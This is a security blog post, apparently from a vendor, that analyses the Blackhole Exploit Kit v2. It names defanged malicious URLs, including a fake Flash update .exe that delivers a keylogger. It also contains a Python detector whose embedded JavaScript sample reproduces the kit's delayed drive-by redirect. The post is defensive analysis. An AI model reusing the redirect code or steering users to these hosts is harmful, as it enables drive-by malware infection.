It should come as no surprise that attackers are upgrading their Blackhole exploit kits to a new and more powerful version. With the launch of Blackhole Exploit Kit v2, an update is now available, and we are starting to see adoption of this latest version.
v2 differs from v1 in many ways. Numerous enhancements have been made to ensure that the exploit kit remains undetected in the wild.
Some of the key enhancements include:
- The URL format is dynamic: it does not follow a fixed pattern as the version 1.0 URLs did.
- Malicious executables delivered by the kit are now also protected against being downloaded more than once.
Heavy obfuscation of the code continues as in the prior version. Like Blackhole Exploit Kit v1, v2 continues to target known vulnerabilities in Internet Explorer (IE), Adobe and Java. A sample of raw Blackhole Exploit Kit v2 code can be seen in the following recent infection:
Exploit Kit URL: hxxp://anygutterking.com/links/assure_numb_engineers.php
Deobfuscating the code allows for easier analysis. While we use a proprietary tool built in house for this purpose, you can also use tools like Malzilla and Jsunpack, or deobfuscate the code manually.
The deobfuscated code shown below is divided into two parts for better understanding.
- Browser plugins/components detection
The code shown in the screen-shot detects the different plug-ins and ActiveX components by scanning the browser's DOM. By identifying the versions of the installed plugins/components, the exploit kit can target known vulnerabilities in them.
- Attacking the vulnerabilities
In this case, a well-known vulnerability (CVE-2006-4704) in the WMI Object Broker in Microsoft Visual Studio 2005 was targeted. For more information about this vulnerability, read our detailed blog post here. This vulnerability was also targeted by Blackhole v1 and by other exploit kits such as the Incognito exploit kit.
At the end of the code, we see a redirect request to “hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe”. This is a new addition to the exploit code released in this version. If the victim’s browser is patched and none of the vulnerabilities were exploited, this redirection still gives the attacker one last chance to compromise the victim’s machine. The variable “end_redirect” highlighted in the above screen-shot is passed to the setTimeout function. After 60 seconds, the page is redirected to the aforementioned link, which is a fake Adobe Flash update page. This is a typical example of a drive-by download attack. Once redirected to this page, the user is prompted to download an .exe file labeled “update_flash_player.exe”.
Screen-shot of the fake Adobe page hosted on the malicious domain:
The VirusTotal report shows that currently only 3/43 AV vendors flag this file as malicious. The ThreatExpert report for the same file came back as expected: it identified the file with the highest severity level, and the analysis indicators show the binary belonging to the ‘keylogger’ family. The file also connects to the Internet and downloads additional .exe files.
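To help analysts spot this fallback during triage, here is an added example (our own, not code from the post or from the kit): a small Python checker that scans deobfuscated landing-page JavaScript for a long setTimeout whose callback navigates the page, and flags targets that end in .exe. The embedded JavaScript sample is constructed to mirror the behaviour described above; the names `SAMPLE_JS`, `find_delayed_redirects` and the 10-second threshold are our own choices.

```python
import re
from collections import namedtuple

# Constructed sample of deobfuscated landing-page JavaScript that mirrors the
# fallback described in the post (hypothetical code, not the real kit's).
SAMPLE_JS = r"""
var end_redirect = function () {
    document.location = "hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe";
};
setTimeout(end_redirect, 60000);
"""

# setTimeout(<named callback> | function () {...}, <delay>)
SET_TIMEOUT_RE = re.compile(
    r"setTimeout\s*\(\s*(?:(?P<name>[A-Za-z_$][\w$]*)"
    r"|function\s*\([^)]*\)\s*\{(?P<inline>[^}]*)\})\s*,\s*(?P<delay>\d+)\s*\)"
)
# Navigation via a location assignment or location.replace()/assign()
LOCATION_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']"
    r"|location\.(?:replace|assign)\s*\(\s*[\"']([^\"']+)[\"']"
)

# fetches_executable is True when the redirect target ends in .exe
DelayedRedirect = namedtuple("DelayedRedirect", "callback delay_ms url fetches_executable")

def _callback_body(js, name):
    # Body of `function name() {...}` or `name = function () {...}` (single-level braces)
    n = re.escape(name)
    for pat in (rf"function\s+{n}\s*\([^)]*\)\s*\{{([^}}]*)\}}",
                rf"{n}\s*=\s*function\s*\([^)]*\)\s*\{{([^}}]*)\}}"):
        m = re.search(pat, js)
        if m:
            return m.group(1)
    return ""

def find_delayed_redirects(js, min_delay_ms=10_000):
    # Flag setTimeout callbacks that navigate the page after a long delay; short timers are skipped
    findings = []
    for m in SET_TIMEOUT_RE.finditer(js):
        delay = int(m.group("delay"))
        if delay < min_delay_ms:
            continue
        name = m.group("name") or "<inline>"
        body = m.group("inline") if m.group("inline") is not None else _callback_body(js, name)
        for loc in LOCATION_RE.finditer(body):
            url = loc.group(1) or loc.group(2)
            findings.append(DelayedRedirect(name, delay, url, url.lower().endswith(".exe")))
    return findings
```

Run it over the deobfuscated output of Malzilla or Jsunpack; a hit with `fetches_executable` set is the drive-by fallback this post describes, while a non-.exe hit still deserves a look.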
Screen-shot of ThreatExpert report:
Exploit kits are becoming smarter day by day, which keeps security vendors on their toes in the effort to combat new attacks. Fortunately, the cloud infrastructure at Zscaler gives us the flexibility to quickly add new detections as needed.
With Blackhole Exploit Kit v1, we saw an increase in malicious domains hosting exploit kit URLs as the kit matured over time. With the latest version being more sophisticated, we expect to see even more rapid growth of Blackhole Exploit Kit v2.